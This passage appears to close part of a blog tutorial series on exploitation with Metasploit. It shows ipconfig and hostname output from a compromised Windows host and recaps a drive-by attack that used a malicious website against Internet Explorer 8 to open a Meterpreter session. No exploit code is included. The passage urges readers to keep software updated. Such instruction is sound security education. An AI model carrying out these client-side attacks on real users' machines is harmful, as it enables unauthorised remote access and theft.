Ethernet adapter Bluetooth Network Connection:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::a0dd:5cb7:b23d:af11%11
   IPv4 Address. . . . . . . . . . . : 10.0.1.11
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.1.1
Tunnel adapter isatap.austin.rr.com:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
Tunnel adapter Local Area Connection* 13:
   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : 2001:0:5ef5:79fd:3cfe:11c4:f5ff:fef4
   Link-local IPv6 Address . . . . . : fe80::3cfe:11c4:f5ff:fef4%13
   Default Gateway . . . . . . . . . : ::
Tunnel adapter isatap.{6657C62C-5DA5-4E0B-9C4A-2786A3F83F20}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
C:\Users\eric\Desktop>hostname
hostname
WIN-FDN9DNVQ5IR

So what have we accomplished so far?  We set up a client-side exploit by using Metasploit to craft a malicious website that exploited a vulnerability in an old version of Internet Explorer 8.  The exploit then loaded a malicious payload that opened a Meterpreter session for us that we used to remotely access Victim.  Pretty cool, huh?

Hopefully, this will make you think twice about joining “free Wi-Fi” or clicking on suspicious links.  This should also encourage you to keep your software up to date, especially your internet browser.

What’s Next

So far, we’ve seen how easy it is to exploit vulnerabilities and affirmed the importance of maintaining updated software.  In the final part of this series, we’ll further explore Meterpreter and its capabilities including privilege escalation, data exfiltration, and maintaining persistence.
